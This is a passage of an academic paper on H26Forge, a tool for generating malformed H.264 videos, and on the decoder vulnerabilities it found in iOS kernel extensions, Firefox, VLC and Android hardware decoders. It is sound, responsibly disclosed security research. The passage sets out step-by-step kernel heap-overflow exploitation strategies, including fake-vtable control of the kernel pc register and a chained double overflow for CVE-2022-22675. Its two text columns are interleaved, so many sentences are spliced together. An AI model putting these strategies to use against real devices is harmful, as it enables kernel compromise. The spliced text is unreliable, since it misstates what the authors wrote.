denial-of-service bug in the AppleD5500.kext caused by an a controlled kernel heap overflow. Unlike the previously
infinite loop in a kernel thread. The infinite loop causes the described bugs, we were able to trigger this bug only when
device to heat up, then reboot due to a panic induced by a playing a video, not through preview thumbnail generation.
watchdog timeout. Like Bug 1, this bug can be triggered by Apple assigned this bug CVE-2022-42850 and patched it in
playing or generating a preview thumbnail of a malformed iOS and iPadOS version 16.2 [5].
video. A video randomly generated by H26F ORGE triggered H26F ORGE was not built to support H.265, but because
this bug and caused a kernel panic; we then reverse engineered the bug was in SPS parsing, for which H.265 and H.264 use
the affected code to perform a root-cause analysis. Apple similar encodings, we were able to produce our proof-of-
assigned this bug CVE-2022-42846 and patched it in iOS and concept video without the wholesale revamp of H26F ORGE
iPadOS versions 15.7.2 and 16.2 [4, 5]. that would be required for implementing H.265’s stateful
We found this issue when generating videos with IDR entropy encodings.
NALUs with Inter predicted slice types. IDR NALUs are The vulnerability is a missing bounds check for num_
meant to be Intra predicted slices that force the decoder short_term_ref_pic_sets. This value dictates how many
to flush its decoded picture buffer (DPB); Inter prediction short term reference picture set (RPS) objects should be in
thus has a list of 0 DPBs to work with, a condition that the SPS, which the spec—but not Apple’s implementation—
the parsing code did not anticipate. A missing check for caps at 64.17 The short term RPS objects, each 172 bytes
arithmetic overflow in computing loop bounds and some un- long, are copied from the video bitstream into an array mem-
lucky choices for variable types lead to a loop of the form ber variable of a decoder context object; after the array is
for (uint8 i = 0; i < 256; i++). The loop body cor- filled, subsequent RPS objects overwrite the remainder of the
rupts a heap object used by the decoder, but does not overflow context object and then adjacent heap allocations.
into adjacent heap objects. After 180 seconds, a watchdog With the help of H26F ORGE, we confirmed that a mali-
forces a panic and device restart. cious video can overwrite heap memory. Through reverse
Apple’s assessment was that “[p]arsing a maliciously engineering of the decoder, we identified an exploitation strat-
crafted video file may lead to unexpected system termina- egy that allows the attacker to take control of the kernel pc
tion.” register and used H26F ORGE to develop a proof-of-concept
exploit following this strategy. Our strategy overwrites an-
other member variable within the context object, so it does not
5.2 Quick proofs of concept require heap grooming. However, it does require knowledge
In some cases, a security analyst who is auditing video- of kernel heap layout, so in an end-to-end exploit would need
handling code may have reason to believe that a bug exists— to be combined with a kernel memory disclosure bug.
for example, she may spot a missing bounds check in the The member variable we overwrite is a pointer to an object
that has a virtual destructor, called when decoding ends and
16 Specifically, the array stores adjusted bit offsets, so the ith EPB, at byte

offset b, is recorded as A[i] ← 8(b − i). The 257th EPB overwrites i with 17 An H.265 video can have at most 65 RPSes: 64 in the SPS and 1 in a

8(b257 − 256), and as a result the 258th EPB stores 8 b258 − 8(b257 − 256) ; slice header. AppleD5500.kext’s SPS RPS array is length 65 to accommodate
NALU length limits keep b258 from being more than 8 times b257 . this, but it does not impact our analysis.
the context object is freed. By overwriting this pointer with the SPS object, this overflow can overwrite at most 832 bytes
the address of a fake object that itself points to a fake vtable, past the SPS object.
we can arrange to have any address of our choosing called in The SPS object is contained in an array of length 32 in an
place of the legitimate destructor.18 AppleAVD.kext H.264 User Context. The SPS is indexed by
We did not attempt to develop an end-to-end exploit chain; its seq_parameter_set_id, with subsequent SPSes with the
however, Apple’s assessment was that this bug, like Bug 1, same ID overwriting previously decoded ones. Immediately
may allow an app “to execute arbitrary code with kernel priv- after the SPS array is a PPS array of length 256, similarly
ileges.” indexed by pic_parameter_set_id. This means that an
H26F ORGE was crucial in the development of this video, overflowing HRD parameter will impact either a neighboring
as given the lack of byte-alignment in exp-Golomb encoded SPS or PPS, depending on the seq_parameter_set_id. An
values, hand tuning this file would be difficult. Updating the SPS object is 2224 bytes long and a PPS object is 604 bytes
video to target new addresses, or overwrite another object is long, so we can either overwrite the first part of a neighboring
straightforward via our video transform. SPS or completely rewrite the PPS at index 0 along with the
start of the PPS at index 1.
For the overwrite to have an effect, though, the overflowing
5.3 Interactive testing HRD parameter must be decoded after a benign SPS or PPS
has already been decoded to modify what the parameters
The third way an analyst can use H26F ORGE is to interac- should be, otherwise anything written in the overflowed space
tively test video decoding as part of a complete examination, will be cleared out when decoding the benign SPS or PPS.
or even root-cause analysis, of an in-the-wild exploit. For
The Project Zero proof-of-concept. Using H26F ORGE,
example, CVE-2022-22675 is an out-of-bounds write due to
we are able to explain why the proof-of-concept video in
a missing bounds check in the AppleAVD.kext affecting iOS
the Project Zero writeup does not cause a crash. First, the
versions up to 15.4. Google Project Zero’s write up of the
video NALUs are not properly ordered. It starts with an SPS
bug [43] includes a partial proof-of-concept video which does
of ID 31 containing the out-of-bounds cpb_count_minus1,
not lead to a crash.
a PPS of ID 0, and a slice pointing to PPS 0. As is, the
We reverse engineered AppleAVD.kext and used a kernel malformed SPS would be decoded before the benign PPS, thus
debugger to test our hypotheses about the bug and its effects. any overwritten values would be ignored by the subsequent
H26F ORGE was crucial for producing the video inputs for parsing of the PPS. Second, the PPS points to an SPS of ID
these debugging sessions. 0, but since that does not exist at decoding time, the decoder
Notation. When describing SPSes and PPSes, we include halts. This proof-of-concept video is quite large, at 20 MB,
the ID in the subscript (e.g., SPSID , PPSID ). For slices we but we verified by stepping through the Corellium kernel
include the PPS ID it points to in the subscript and the type debugger that decoding stops when the first slice cannot find
Type a valid SPS.
in a superscript (e.g., SlicePPS ID ).
The CVE-2022-22675 bug. This bug was a missing bounds An H26F ORGE-produced proof-of-concept. We outline
check for the cpb_count_minus1 syntax element located in the steps necessary to construct a video that induces a con-
a function called parseHRD which recovers the hypothetical trolled kernel heap overflow by overwriting a PPS parameter.
reference decoder (HRD) parameters, nested within SPS pars- Figure 3 shows our overall strategy. More details about our
ing. SPSes can have two different HRD parameters, and their final step are in Appendix A.
usage and syntax elements are described in Annexes C and E Step 1: correct ordering. We use H26F ORGE to generate a
of the H.264 spec [23]. According to the spec, cpb_count_ video with the following NALUs: SPS0 , PPS0 , SPS0 , SliceI0 ,
minus1 should have a maximum possible value of 31, but and SliceP0 . The second SPS NALU is where the parseHRD
because there is no bounds check and the value is exp-Golomb overflow will exist to corrupt PPS0 .
encoded, we can set it to the maximum value AppleAVD.kext Step 2: fix the IDs. We create a video transform to adjust
can store: 255. This parameter is used as a loop bound to parameter IDs. We set the second SPS’s ID to 31 so it will
parse two exp-Golomb encoded uint32 values that are not be stored at the end of the SPS array. With H26F ORGE we
bounds checked, and an additional single bit. As these are produce both a raw H.264 file and an MP4 video 19 with the
stored in arrays of length 32, when the counter goes past the following order: SPS0 , PPS0 , SPS31 , SliceI0 , SliceP0 .
expected length AppleAVD.kext will begin to write into the
19 MP4 files contain an avcC atom with all SPSes and PPSes together.
rest of the SPS object and then past the SPS’s allocated mem-
MP4 parsers will decode all SPSes, then PPSes, which conflicts with the
ory. Because of where the second HRD parameters are in desired order of events. The MP4 muxer in H26F ORGE is modified to
only add the first observed SPS and PPS to the avcC atom, and subsequent
18 Arm Pointer Authentication, which would have prevented us from faking parameter sets to mdat atoms. Thus, we cannot hit the vulnerable code-path
a vtable, was not introduced until the Apple A12 [6], whereas the last Apple by thumbnailing, but may be able to target local privilege escalation. An SPS
SoC to use AppleD5500.kext was the A11. overwrite may be possible through thumbnailing.
H.264 Bitstream H.264 User Context in Memory in the iOS kernel debugger while playing the video from the
SPS PPS Slices
previous step allows us to inspect memory and identify write
SPS0
* targets in the PPS. We describe an exploit strategy that uses
(1) ... 0 ... 31 0 ... 255 0 1 ... 599 ...
PPS0
0x00..00 0xff..ff
the capability described so far to overwrite the num_ref_idx_
l0_active_minus1 PPS parameter.
SPS PPS Slices This parameter is used as a loop bound in prediction weight
SPS31 (2) ... 00 ...
... *
31
31 0 ... 255 0 1 ... 599 ...
table syntax parsing, parsePredWeightTable, in which cer-
0x00..00 0xff..ff
parseHRD tain 16-bit values are copied from the bitstream to an array
SPS PPS Slices
member variable in the H.264 User Context object. According
(3) ... 0 ... * *0
31 ... 255 0 1 ... 599 ... to the spec, num_ref_idx_l0_active_minus1 should be at
SliceI0 0x00..00 0xff..ff most 31, a limit that AppleAVD.kext correctly checks when
num_ref_idx_default_active_l0
parsing PPS parameters. By overwriting this parameter with
SliceP 1 SPS PPS Slices
Bn larger values using the first-stage overflow, we can exceed
(4) ... 0 ... * *0
31 ... 255 0 *1 ... 599 ... Bn
its limit and cause the parsePredWeightTable loop to write
0x00..00 0xff..ff
parsePredWeightTable past the end of the array allocated for it within the H.264 User
SliceP2
Bn-1
SPS PPS Slices Context object, triggering a second overflow. This is depicted
(5) ... 0 ... * *0
31 ... 255 0 *1 *... 599 B...
1..n-1 Bn in part (3) of Figure 3.
0x00..00 0xff..ff In a video transform, we set cpb_count_minus1 to
SlicePn
B1 stop looping at the position it can write num_ref_idx_l0_
Decoded slice Write
headers direction active_minus1, and use one of the exp-Golomb encoded
HRD parameters to set it to its maximum value of 255.
Figure 3: Exploiting CVE-2022-22675. The left-hand side
Step 5: satisfy constraints and enable second overflow.
shows the correctly ordered H.264 bitstream, read from top
Arranging for the first overflow to overwrite num_ref_idx_
to bottom, and the right-hand side shows the decoded con-
l0_active_minus1 with a larger value is not enough. We
tents in memory as they are filled in. (1) The initial SPS
must make sure that other PPS parameters we overflow take on
and PPS parameters are read, each with ID 0 (SPS0 , PPS0 ).
reasonable values to avoid an early exit from video decoding
(2) An SPS with ID 31 is parsed, where we use an out-of-
because of a failed AppleAVD.kext check. We must also make
bounds cpb_count_minus1 in parseHRD to overwrite PPS0 .
sure that slice headers that refer to the PPS parameters we
(3) PPS0 is overwritten with an out-of-bounds num_ref_idx_
overwrite are Inter predicted and do not have num_ref_idx_
l0_active_minus1, used in Slice decoding. (4) The over-
active_override_flag set; otherwise prediction weight
written num_ref_idx_l0_active_minus1 causes a second
table syntax parsing is skipped. We must also fill in the
overflow in parsePredWeightTable, writing a 16-bit value
slice headers with enough prediction weight table parameters
Bn greater than 255 at a controlled offset away, with inter-
to account for the overwritten loop bound, not the original
mediate memory set to a default value. (5) Arbitrary length
maximum of 31.
values can be written by adjusting the offset in each subse-
quent slice, writing the values backwards. With these additional constraints satisfied, we can trigger a
kernel panic due to an out-of-bounds write past the allocated
memory of the H.264 User Context.
Step 3: add the overwrite. With our video that contains
the IDs in the correct order, we can now change the syntax Step 6: controlling the second overflow. Unfortunately, the
elements of SPS31 to trigger CVE-2022-22675. Parts (1) and crashing video is not immediately useful for heap corruption,
(2) of Figure 3 illustrate the ordering and this overflow. for two reasons. First, the overwrite we trigger is so large
The HRD parameters are part of an optional syntax element that it overflows not only the User Context but also the kernel
nested inside an SPS. We first use a video transform to ensure heap as a whole, because the loop bound is derived by sign
that the parameters will be parsed, then we set cpb_count_ extending the num_ref_idx_l0_active_minus1 parameter
minus1 to 255. To understand how the syntax elements in the from 8 bits to 32. Second, the 16-bit values the loop writes to
loop are used during the overwrite, we set both exp-Golomb the heap are badly constrained: Each must be between 0 and
encoded values to a noticeable pattern, and all the byte-sized 255 or the loop stops after writing it.
flag values to true. These two problems neatly solve each other.
We now have a video with the following order: SPS0 , By arranging for the bitstream to include a larger-than-255
PPS0 , SPS∗31 , SliceI0 , SliceP0 , where SPS∗31 contains the over- value when we have written enough, we can get the loop to
write. exit early despite the huge loop bound. The 16-bit values
before the last one must still be between 0 and 255. Part (4)
Step 4: control the overwrite location, and produce a sec- of Figure 3 shows this arrangement, with the last value written
ond overflow. Setting a breakpoint at slice header decoding denoted Bn .
If we include further slices that reference the PPS param- regardless of actual video encoding size. Firefox relied on
eters we overflowed, we can cause the overflowing loop to this MP4 metadata to create video frames, but because the
execute again, copying a different part of the bitstream into encoded frame size was larger than expected, we were able to
the same User Context object. By working backwards, with trigger a buffer overflow in the GPU utility process. This was
each slice writing fewer bytes than the ones before, we avoid patched by changing the utility process to rely on the returned
undoing the work done earlier in the exploit. This technique frame parameters rather than the stored metadata.
is illustrated in part (5) of Figure 3. The first slice writes the Due to the GPU utility process crashing, Firefox fell back
out-of-bounds value Bn and stops; the second writes Bn−1 and to decoding the video in software. From the provided analysis,
stops; and so on, until after k slices we have written 2k arbi- the Firefox software decoder took frame size parameters from
trary bytes at an arbitrary offset from the User Context object. only the first SPS and did not adjust to SPS changes. Thus,
We provide more details on how we arrange the bitstream in because our encoded video has an initial SPS with frame size
Appendix A. parameters bigger than the second SPS, Firefox was unable
Exploitation. We have used H26F ORGE to automate the to fill up the frame contents of slices after the SPS change,
creation of a video that uses the described exploit strategy to and we were able to read the contents of memory. Figure 4
write an attacker-chosen payload at an attacker-chosen offset shows what the user saw. Firefox patched this by adding code
from the H.264 User Context object in the iOS kernel heap. to use the correct SPS when creating a frame size.
As with our Bug 3 from Section 5.2, leveraging this heap- H26F ORGE can set the width and height of an MP4 to
overflow primitive into arbitrary kernel execution is likely to either the actual frame size, a random value, or a user specified
require heap grooming and a kernel address disclosure bug, value, without having to worry about MP4 atoms. It can also
with the presence of pointer authentication in SoCs that use generate videos with multiple SPSes. By adjusting the SPS
AppleAVD compounding the challenge. A recent presentation frame size parameters with a video transform, H26F ORGE
by Tarakanov and Labunets discusses these challenges and can control how much information is read out.
proposes some AppleAVD exploitation strategies [45].
6.2 VLC use-after-free
6 More H26F ORGE Findings On VLC for Windows version 3.0.17, we discovered a use-
after-free vulnerability in FFmpeg’s libavcodec that arises
We describe more issues discovered by using H26F ORGE when interacting with Microsoft Direct3D11 Video APIs. We
as a grammar-aware fuzzer and to generate proof-of-concept found this by testing generated videos in VLC. The bug is
videos. We start by showing that heavily fuzzed desktop triggered when an SPS change in the middle of the video
software, such as Firefox and VLC, can have vulnerabilities forces a hardware re-initialization in libavcodec. If exploited,
unearthed through our technique of producing H.264 videos an attacker could gain arbitrary code execution with VLC
with unexpected syntax element values. Then, we describe privileges. We reported this issue to VLC and FFmpeg, and
issues that primarily affect hardware video decoding, such as they have fixed it in VLC version 3.0.18 and FFmpeg commit
fingerprinting and vulnerable implementations. cc867f2.20
The use-after-free comes from libavcodec’s multithreaded
handling of hardware contexts. VLC will create a libavcodec
6.1 Firefox crash and information leak context, and send each NALU to this context for processing.
We tested generated videos on Firefox 100 as described in Libavcodec assigns each NALU to a thread, which interacts
Section 5.1, and discovered an out-of-bounds read that causes with the hardware context to decode a frame. When a libav-
a crash of the Firefox GPU utility process and a user-visible codec thread encounters a new SPS, it frees the old hardware
information leak. The issue arises from conflicting frame context and re-initializes a new one with the new SPS param-
sizes provided in the MP4 container as well as multiple SPSes eters. It then sends the updated hardware context to the other
across video playback. Note that both the crash and infor- threads for synchronization.
mation leak are caused by a single video. To exploit this Unfortunately, libavcodec forgot to update the main thread
vulnerability an attacker has to get the victim to visit a web- with this new context, so when the video finishes and VLC
site on a vulnerable Firefox browser. We reported this finding tries to close the libavcodec context, the stale hardware con-
to Mozilla, and it has been assigned CVE-2022-3266 and text address is freed again. Before freeing the address, libav-
patched in version 105 [33]. codec checks the data at the address to determine whether to
Since Firefox cannot play raw H.264 files, we mux our call a virtual destructor. It is possible that an attacker-groomed
generated videos into an MP4 file. The MP4 file contains heap may lead to a use-after-free and code execution as the
frame width and height metadata, but this information does VLC process.
not need to match the encoded data. For every MP4 video 20 Online: https://github.com/FFmpeg/FFmpeg/commit/
we created, we set the width and height to a small constant, cc867f2c09d2b69cee8a0eccd62aff002cbbfe11.
Figure 5: Luma Chroma Thief. On the left, we vertically
Intra predict at the top-most row of macroblocks. On the
right, we horizontally Intra predict at the left-most column of
macroblocks.

motion vector differences. Because these syntax elements are


CABAC/CAVLC encoded, the browser will forward them to
the underlying hardware decoder. For Intra predicted values,
Figure 4: Information leak in Firefox. A video that contains
we find that edge-most Intra prediction, which we discuss
two SPSes with the second having a smaller vertical frame
about more in the next section, can illuminate hardware differ-
size causes the space to be filled with uninitialized memory.
ences. Similarly, motion vector differences set to values that
are larger than the frame size have different results depending
With H26F ORGE, we can generate a small proof-of- on if the hardware decides to (1) trim the value; (2) ignore
concept video with two SPSes that triggers the vulnerability. the value; or (3) perform a modulo operator on the value with
A better understanding of how encoded videos impact VLC some internal value.
memory may allow a security researcher to develop an exploit Most video decoders have some kind of error resilience
with H26F ORGE. features to still display an image even if there is an error in
the encoded video, which can also serve as a fingerprinting
6.3 Issues found in hardware and drivers mechanism. Some decoders decide to cover up errors by
overwriting the rest of the frame with a specific value, often
We tested the videos produced by H26F ORGE on a variety 0x00 or 0x80, copy over the last correctly decoded frame, or
of Android devices with varying hardware video decoders, perform a neighboring Intra prediction to paint over the error.
all listed in Table 2. In doing so, we found issues that span
different hardware manufacturers, and more serious vulner-
abilities in hardware decoders and their associated kernel 6.3.2 Luma Chroma Thief—Multiple device informa-
drivers. To target a breadth of video decode IP, we went with tion disclosure
older, cheaper SoCs, but note that some of our findings (such
as Luma Chroma Thief) impact newer MediaTek devices as A common vulnerability across decoders allowed us to re-
well, and the videos produced by H26F ORGE can be used to cover stale or uninitialized data from the decoder. We call
test new and future devices. this vulnerability Luma Chroma Thief (LCT). Figure 5 gives
a high level overview of the issue. To exploit this, an at-
tacker needs to convince a victim to play the video where
6.3.1 Fingerprinting
the attacker can see the output. We reported LCT to Google
Perhaps unsurprisingly, we find that videos created with and MediaTek, and MediaTek said the output is “randomized
H26F ORGE produce frames with different pixel values when dummy data,” thus not security-critical.
decoded on different devices, and therefore can serve as LCT works by exploiting Intra prediction at the top-most
a browser fingerprinting mechanism through the HTML5 and left-most edges of a frame. On the top-most row of mac-
video element and the new WebCodecs API [1]. Finger- roblocks, vertical Intra prediction should not be possible be-
printing is possible even with spec-conforming videos, but cause there are no reference macroblocks. We find that when
non-conforming videos distinguish some otherwise equiva- we construct a video with these operations, we can recover pix-
lent implementations. els from the most recently decoded video, or videos decoding
(Browsers expose many APIs usable for fingerprinting [25], in parallel. We note that this would only take the bottom-most
so we do not claim that an additional mechanism will upset row of pixels, so entire frame reconstruction is not possible
the balance of tracking and anonymity on the web.) with this method. Because chroma and luma are stored sepa-
We focus on exploring entropy-encoded prediction vari- rately, we can choose which components to read. On some de-
ables, such as Intra prediction mode, and Inter prediction vices, if (1) enough time has elapsed, (2) no video has been re-
Table 2: Evaluated devices, sorted by VPU. All run an Android Agent, with the Chromebook relying on Android Runtime on
Chrome OS [35]. The “HDT” column gives the number of hardware decoding threads. EMUI and MIUI are modifications by
Huawei and Xiaomi respectively. The “Kernel” column gives the version number of the Linux kernel.

Device Type SoC VPU HDT OMX Name Android Version Kernel
Odroid C2 SBC Amlogic S905 Amlogic Video Engine 1 OMX.amlogic.avc.decoder.awesome 6.0.1 3.14.29
Pine A64 SBC Allwinner A64 CedarV 4 OMX.allwinner.video.decoder.avc 7.1.2 3.10.105
Huawei Honor 9x Phone HiSilicon Kirin 710 HiSilicon VDEC V200 16 OMX.hisi.video.decoder.avc 9 (EMUI 9.1.0) 4.9.148
HP Chromebook 11a Netbook MediaTek MT8183 MediaTek VPU 8 c2.vda.avc.decoder 9 5.10.114
Lenovo TB-7305F Tablet MediaTek MT8321 MediaTek VPU 4 OMX.MTK.VIDEO.DECODER.AVC 9 4.9.117
Xiaomi Redmi Note 8 Pro Phone MediaTek Helio G90T MediaTek VPU 16 OMX.MTK.VIDEO.DECODER.AVC 9 (MIUI 11.0.4.0) 4.14.94
Xiaomi Redmi 9C Phone MediaTek Helio G35 MediaTek VPU 16 OMX.MTK.VIDEO.DECODER.AVC 10 (MIUI 12.0.7) 4.9.190
Huawei MediaPad M5 Lite Tablet HiSilicon Kirin 659 PowerVR D5500 8 OMX.IMG.MSVDX.Decoder.AVC 8 (EMUI 8) 4.4.23
Huawei Honor 8 (FRD-AL10) Phone HiSilicon Kirin 950 PowerVR D5500 8 OMX.IMG.MSVDX.Decoder.AVC 7 (EMUI 5.0.1) 4.1.18
Dragonboard 410C SBC Qualcomm Snapdragon 410 Qualcomm Venus 8 OMX.qcom.video.decoder.avc 5.1.1 3.10.49
Galaxy Tab E Tablet Qualcomm Snapdragon 410 Qualcomm Venus 8 OMX.qcom.video.decoder.avc 7.1.1 3.10.49
Nano Pi M4 SBC Rockchip RK3399 RKVdec/Hantro 6 OMX.rk.video_decoder.avc 8.1 4.4.167
Odroid XU4 SBC Samsung Exynos 5422 Samsung MFC 8 OMX.Exynos.AVC.Decoder 4.4.4 3.10.9
VANKYO MatrixPad S21 Tablet UNISOC SC9863A UNISOC VSP 10 OMX.sprd.h264.decoder 9 4.4.147
VANKYO MatrixPad S10 Tablet UNISOC SC7731E UNISOC VSP 10 OMX.sprd.h264.decoder 9 4.4.147

cently decoded, or (3) there is no other decode going on at the Table 3: Luma Chroma Thief results for test devices. We
same time, we can recover uninitialized data from the decoder. run both horizontal (HLCT) and vertical (VLCT) LCT in
To generate LCT, we start with a video that contains an SPS, parallel with another video and sequentially right after another
PPS, and I slice and we remove all the residue, disable the video has been decoded. Device are grouped by VPU.
deblocking filter, and set the macroblocks to be a target mac-
roblock type. Listing 1 shows a video transform to generate Device HLCT-P HLCT-S VLCT-P VLCT-S

LCT. Based on the specification, we can do Intra prediction at Odroid C2 N/A Thief N/A Thief
Pine A64 Uninit Uninit Uninit Uninit
three different granularities: 16 × 16, 8 × 8, and 4 × 4. Note Huawei Honor 9x 0x80/Thief 0x80/Uninit 0x80/Thief 0x80/Uninit
that the 8 × 8 granularity forces the block to go through the HP Chromebook 11a Y:0x10; Y:0x10; Uninit Uninit
UV:0x80 UV:0x80
deblocking filter [30], so the 8 × 8 predicted blocks will not Lenovo TB-7305F Y:0x10; Y:0x10; Y:0x10; Y:0x10;
provide the exact recovered values. When testing LCT on UV:0x80 UV:0x80 UV:0x80 UV:0x80
Xiaomi Redmi Note 8 Pro 0x00 0x00 Uninit Uninit
devices, we find all granularities produce consistent results. Xiaomi Redmi 9C 0x00 0x00 Uninit Uninit
Even though only the top-most or left-most columns will read Huawei MediaPad M5 Lite 0x80 0x80 0x00 0x00
Huawei Honor 8 (FRD-AL10) 0x80 0x80 0x00 0x00
from buffers with unexpected values, we copy the same Intra Dragonboard 410C 0x00 0x00 Thief Thief
prediction mode for the rest of the slice to amplify the data. Galaxy Tab E 0x00 0x00 Thief Thief
Nano Pi M4 0x80 0x80 0x80 0x80
We test the vertical and horizontal LCT videos against a Odroid XU4 0x00 0x00 0x80 0x80
target video when running in parallel and sequentially. Paral- VANKYO MatrixPad S21 Thief Uninit Thief Uninit
VANKYO MatrixPad S10 No Output No Output Thief Uninit
lel decoding means we start the target video, start LCT, and Thief: LCT was successful in stealing pixels.
stop the target video. In this scenario, each video is consum- Uninit: LCT was able to read uninitialized data.
No Output: The surface value was black, and output to a file was empty.
ing a single thread of the hardware video decoder. When Hex numbers: the value of the indicated component(s) (e.g., Y:0x10; UV:0x80) or the
testing sequentially, we play LCT after the target video has value of each YUV component (e.g., 0x80).
N/A: The Odroid C2 has a single-threaded decoder, so parallel decoding is not possible.
stopped, thus testing if there is any leftover data in the hard- 0x80/Thief/Uninit: the Honor 9X produced a frame that was mostly error concealed,
ware video decoder. Figure 6 shows what LCT looks like on except for a single macroblock.
the VANKYO S21, which allows for parallel stealing. Table
3 shows the results for all our target devices. ements. First, the first_mb_in_slice slice header syntax
Because the values that we modify are in the CAVLC/ element is used as a part of the ASO feature to denote where
CABAC encoded macroblock layer, the issues lie at the hard- in the frame to start writing. Second, the mb_skip_run slice
ware video decoder level, either in the firmware or hardware. data syntax element allows CAVLC encoded videos to skip
Furthermore, all layers (browser, decoder, kernel driver) that macroblocks in the frame that are the same as references ones.
inspect the video cannot determine whether a video contains The log messages indicated that either a first_mb_in_
LCT logic without decoding it completely. slice or mb_skip_run larger than the frame size may lead
to an out-of-bounds access. We found evidence of this in the
6.3.3 Hardware memory traversal D5500 in Kirin SoCs, but were not able to produce further
results. For the MediaTek VPU we are able to show a denial-
During our analysis, we found log messages from the D5500 of-service vulnerability on the Redmi Note 8 Pro. Both issues
in Kirin SoCs and the MediaTek VPU that suggest the ability are available from video thumbnailing, so an attacker just has
to traverse hardware memory using two different syntax el- to send a video where a victim may get a thumbnail.
firmware runs on a Imagination Technologies’ custom DSP
architecture called MTX [21], for which we were not able to
find adequate tooling.
Redmi Note 8 Pro MediaTek VPU. A video with an mb_
(a) Target skip_run larger than the frame size leads to a denial-of-
service vulnerability on the MediaTek VPU located in the
Redmi Note 8 Pro. The MediaTek Security Team reported
that they were able to reproduce this issue in Android 9 and
10, but were unable to do so in Android 11 or later.
(b) PV 4 × 4 (c) PV 8 × 8 (d) PV 16 × 16 The MediaTek Helio G90T SoC implements a security
feature called Device Access Permission Control driver (de-
vapc). Devapc enforces device-defined access controls using
TrustZone, and triggers a violation interrupt on unauthorized
accesses. Attempting to decode a video with an out-of-bounds
mb_skip_run triggers a devapc violation and causes the de-
(e) SV 4 × 4 (f) SV 8 × 8 (g) SV 16 × 16 vice to reboot. The reboot happens because the application
processor attempts to access video decoder memory at an
out-of-bounds address, and devapc calls BUG() after logging
the violation.22 The crash does not happen every time, so we
suspect it is a race condition in the MediaTek video decoder
(h) PH 4 × 4 (i) PH 8 × 8 (j) PH 16 × 16 driver. Although other MediaTek VPUs logged violations,
they did not cause reboots.

6.3.4 Kirin SoC D5500 heap overflow

(k) SH 4 × 4 (l) SH 8 × 8 (m) SH 16 × 16 We found a heap overflow in Kirin SoCs running the D5500
video decoder, which includes the Honor 8 and the MediaPad
Figure 6: LCT results on the VANKYO S21 with a M5 Lite. The video uses the FMO feature of H.264; Kirin
UNISOC VSP. The target video is the opening frame of Big SoCs were among the few to support this feature. This vulner-
Buck Bunny [42]. 8 × 8 Intra prediction goes through an extra ability is available from thumbnailing, so an attacker just has
deblocking process, regardless of settings. Parallel vertical to send a video to a victim. This vulnerability does not lend
(PV) LCT takes the bottom-most pixels of the target video, itself to more than a denial-of-service as kernel guard pages
and parallel horizontal (PH) LCT takes the right-most pixels prevent neighboring heap allocations from being impacted.
from the bottom-right-most macroblock. We were not able FMO allows a frame to be split into up to eight slice groups,
to derive a pattern from the recovered uninitialized data in so that if any part is lost in transit the image can still be par-
sequential vertical (SV) and sequential horizontal (SH) LCT. tially reconstructed. FMO is signaled in the PPS by denoting
the number of slice groups to use as well their organization
Kirin SoC D5500. In Kirin SoC devices with the D5500 within a frame. Because each macroblock in the frame can
decoder, we found that we can traverse the decoder stream be in one of eight slice groups, the decoder maintains a map
buffer heap virtual memory by controlling the frame size in of macroblock address to slice group called the Slice Group
the SPS along with the first_mb_in_slice. By adjusting Map (SGM). The D5500 decoder allocates a hardware SGM
these syntax elements with a video transform, we could trigger of size 3600 bytes and enforces this limit by only allowing
MMU page faults that the kernel would log in the stream videos of width 1280 pixels to have FMO support. But be-
buffer heap address range. Per the source code,21 the stream cause the height component is not checked, it is possible to
buffer heap contains structures to decode the video, such as create an SGM larger than 3600 bytes, causing a heap over-
firmware contexts, SPSes, and PPSes, and are managed by flow. The user-side library allocates an SGM that is as large
the device, which may contain device corruptable data. as the frame and passes it to the driver. When the driver at-
We were limited in our ability to determine what the ex- tempts to copy the user SGM buffer to the hardware, it writes
act read or write operations were doing because the D5500 past the allocated space and triggers a kernel panic due to a
guard page access. Though there is an assert in the code to
21 Online: https://github.com/Honor8Dev/android_kernel_
huawei_FRD-L04/blob/master/drivers/vcodec/imagination/ 22 Online: https://github.com/MiCode/Xiaomi_Kernel_
D5500_DRM/decoder/vdec/kernel_device/libraries/vdecdd/code/ OpenSource/blob/begonia-r-oss/drivers/misc/mediatek/devapc/
vdecdd_mmu.c. devapc-mtk-common.c#L333.
prevent an overflow, it is not blocking and merely prints an to replace compressed data in certain file formats with ran-
assert failure. dom bytes that can “be successfully decompressed with high
We use H26F ORGE to generate videos that use FMO with probability.” FuzzGen [22] generates fuzzers for libraries by
a fixed width of 1280 and increasing height to determine the reviewing their real world usage and produces LLVM lib-
bounds of our overflow. Though H26F ORGE cannot decode Fuzzer stubs. The FuzzGen authors evaluated FuzzGen on
FMO videos, it can generate videos that use it. Android codec libraries and found 17 vulnerabilities in H.265
and H.264 codec handling. Synopsis Defensics is an industry
fuzzer that provides an H.264 test suite,26 but they describe
6.3.5 CedarV uninitialized memory leak
slice data testing via mutation fuzzing. It is unclear if it can
On the Pine A64 with the CedarV video decoder, we dis- generate syntax-compliant encoded H.264 videos. None of
covered a new way to exploit the Android ION vulnerability these fuzzers focus on video generation at the syntax level;
found in [47], which allows for kernel information leakage. they also ignore CAVLC and CABAC encoded elements.
We leak out uninitialized memory by creating a video with The security of hardware accelerators is a focus of much re-
H26F ORGE whose first slice NALU is an IDR B slice. The cent work. Olson, Sethumadhavan, and Hill [36] systematize
IDR NALU leads CedarV to create an ION allocation for the threats posed to users by insecure third-party accelerators.
a frame, but the B slice type causes an error, so CedarV In exemplifying these risks, there is much academic and indus-
returns the uninitialized ION memory. The issue only arises try research looking at third party accelerators, such as neural
when CedarV manages the frame allocation; the Android OS processing units [7, 32, 39], digital signal processors [28,
handles frame management when the output is to a Surface, 29], graphics processing units [19], wireless coprocessors [8,
preventing an information leak. 9, 12, 20], security coprocessors [31, 46], and, as described
We defer to Section 6.4 of [47] to describe the exploitation above, hardware video decoders [13, 16, 45].
of this vulnerability.
8 Conclusion
7 Related Work We have described H26F ORGE, domain-specific infrastruc-
ture for analyzing, generating, and manipulating syntactically
We are not familiar with any existing tool that can program- correct but semantically spec-non-compliant video files. Us-
matically modify the syntax elements of an H.264 encoded ing H26F ORGE, we have discovered (and responsibly dis-
video. The current swiss-army knife of the video world, FFm- closed) multiple memory corruption vulnerabilities in video
peg,23 can decode and encode common H.264 videos, but decoding stacks from multiple vendors.
errors out on spec-non-compliant videos and does not sup- We draw two conclusions from our experience with
port many H.264 features. The H.264 reference decoder,24 H26F ORGE.
which is the ground truth for the H.264 spec, does not keep First, domain-specific tools are useful and necessary for
the syntax elements in memory as it focuses on producing an improving video decoder security. Generic fuzzing tools have
